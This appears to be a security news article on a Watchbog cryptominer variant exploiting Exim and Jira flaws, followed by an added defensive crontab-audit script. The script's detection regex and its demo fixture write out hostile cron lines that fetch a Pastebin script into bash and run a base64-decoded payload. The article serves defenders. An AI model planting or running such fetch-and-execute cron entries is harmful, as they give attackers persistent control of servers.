The new version of this variant was spotted by the security researcher polarply. It also exploits CVE-2019-10149, a remote command execution flaw in Exim that lets attackers run commands as root after exploitation and that is known to have been exploited in the wild since at least June 9. According to a current Shodan search, more than 1,610,000 unpatched Exim servers could be affected by this attack, and BinaryEdge counts over 54,000 vulnerable Atlassian Jira servers. Detection is poor: the Watchbog sample found by polarply had a VirusTotal detection ratio of 0/55 at the time of discovery; more information is available on Intezer Analyze. Watchbog is a malware strain used to attack Linux servers running vulnerable software. A May campaign reported by Alibaba Cloud Security researchers targeted Jenkins, along with Nexus Repository Manager 3, ThinkPHP and Supervisord.

Targeting Exim and Jira vulnerabilities

The new variant, found by the Intezer Labs researcher on VirusTotal, uses malicious payloads to exploit CVE-2019-11581, the 12-day-old Jira server-side template injection vulnerability that leads to remote code execution.
After it gains a foothold on a vulnerable server, Watchbog downloads and runs malicious commands hosted on Pastebin, which eventually deploy and launch the final cryptocurrency-miner payload on the compromised Linux box.

Watchbog attack process (image: Alibaba Cloud Security)

The malware also persists by adding itself to several crontab files, so that it can come back and reinfect the system if the user does not remove every crontab entry that was modified.

"Patch Patch Patch! Added to Intezer Analyze – https://t.co/hWZBCHNjxM pic.twitter.com/6s7bXCfV9d" (polarply, @polarply, July 22, 2019)

Infecting Linux servers

The infection process is fairly simple: after exploiting the vulnerability it targets, Watchbog drops a Monero coinminer and protects it against the user's attempts to remove it.
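The persistence mechanism described above (cron entries that re-fetch a remote script and reinfect the host) is something a responder can look for directly. The following crontab audit is an added example written for this page; it is not code from the article, from Intezer or Alibaba Cloud Security, or from Watchbog itself. The file locations it walks, the indicator regex (Pastebin URLs, curl/wget piped into a shell, base64-decoded payloads) and the sample cron entries it builds for the offline demo are all assumptions made for illustration, not an authoritative Watchbog signature.

```shell
#!/usr/bin/env bash
# Added example (not from the article, the researchers cited, or Watchbog itself):
# audit the crontab locations an intruder would modify for entries that fetch and
# execute remote content. The file list and indicator regex are assumptions for
# illustration and should be tuned per environment.
set -u

# Indicators: a pastebin URL, curl/wget piped into a shell, or base64-decoded
# content. Hypothetical heuristics, not an official Watchbog signature.
CRON_INDICATORS='pastebin\.com|curl[^|]*[|][[:space:]]*(ba)?sh|wget[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)'

# Print each non-comment line of one crontab file that matches an indicator,
# as path:lineno:content. Unreadable or missing files are skipped silently.
scan_cron_file() {
    local path="$1"
    [ -r "$path" ] || return 0
    grep -nE -- "$CRON_INDICATORS" "$path" \
        | grep -vE '^[0-9]+:[[:space:]]*#' \
        | sed "s|^|$path:|"
    return 0
}

# Walk the system crontab, cron.d, the periodic dirs and per-user spools under
# ROOT (empty by default, i.e. the live filesystem; pass a mount point to audit
# a disk image instead).
audit_crontabs() {
    local root="${1:-}"
    local f
    for f in "$root/etc/crontab" "$root/etc/cron.d"/* \
             "$root/etc/cron.hourly"/* "$root/etc/cron.daily"/* \
             "$root/var/spool/cron"/* "$root/var/spool/cron/crontabs"/*; do
        [ -f "$f" ] && scan_cron_file "$f"
    done
    return 0
}

# Build a constructed sample tree in a temp dir so the audit can be exercised
# offline. The malicious-looking entries are made up in the style the article
# describes and are not real Watchbog artefacts.
make_sample_tree() {
    local root
    root="$(mktemp -d)"
    mkdir -p "$root/etc/cron.d" "$root/var/spool/cron/crontabs"
    # benign system job: must not be flagged
    printf '%s\n' '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$root/etc/crontab"
    # constructed re-download job: fetch a paste and pipe it into bash
    printf '%s\n' '*/10 * * * * root (curl -fsSL https://pastebin.com/raw/EXAMPLE || wget -qO- https://pastebin.com/raw/EXAMPLE) | bash' > "$root/etc/cron.d/sysupdate"
    # constructed per-user spool: a comment (ignored) plus an encoded payload at reboot
    printf '%s\n' '# a comment mentioning pastebin.com must not be flagged' \
                  '@reboot echo aGVsbG8K | base64 -d | sh' > "$root/var/spool/cron/crontabs/root"
    printf '%s\n' "$root"
}

# Run against the constructed tree when invoked with --demo; on a live host
# simply call audit_crontabs (root access is needed to read the spools).
if [ "${1:-}" = "--demo" ]; then
    demo_root="$(make_sample_tree)"
    audit_crontabs "$demo_root"
    rm -rf "$demo_root"
fi
```

Running the script with `--demo` prints the two constructed malicious entries and nothing for the logrotate job or the comment line. On a real incident the same functions should also be pointed at `/etc/cron.weekly`, `/etc/cron.monthly`, systemd timers and any `/etc/rc.local`, since the article notes the malware spreads itself across several crontab files and the cleanup fails if even one modified entry is missed.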
Watchbog attack (image: Alibaba Cloud Security)

According to the mining configuration file, this variant uses the minexmr.com mining pool, as did the previous version of Watchbog, and it collects all the proceeds at the address 47k2wdnyBoMT6N9ho5Y7uQg1J6gPsTboKP6JxfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7, which was also used during the Jenkins server attack campaign in May.

Payment address

While in previous versions of the malware the attackers would only offer to help remove the infection, promising to send the victim a "cleanup script" and "the source of the entry and patch", this version states that "the mission of the attacker is to safeguard the internet."

Apart from the zero VirusTotal detections and the switch in targets to Jira and Exim servers, one more thing makes this specific Watchbog variant stand out: the malicious script it uses to drop the attack on compromised Linux servers also includes a contact note for its victims. The following note is included in the malicious script: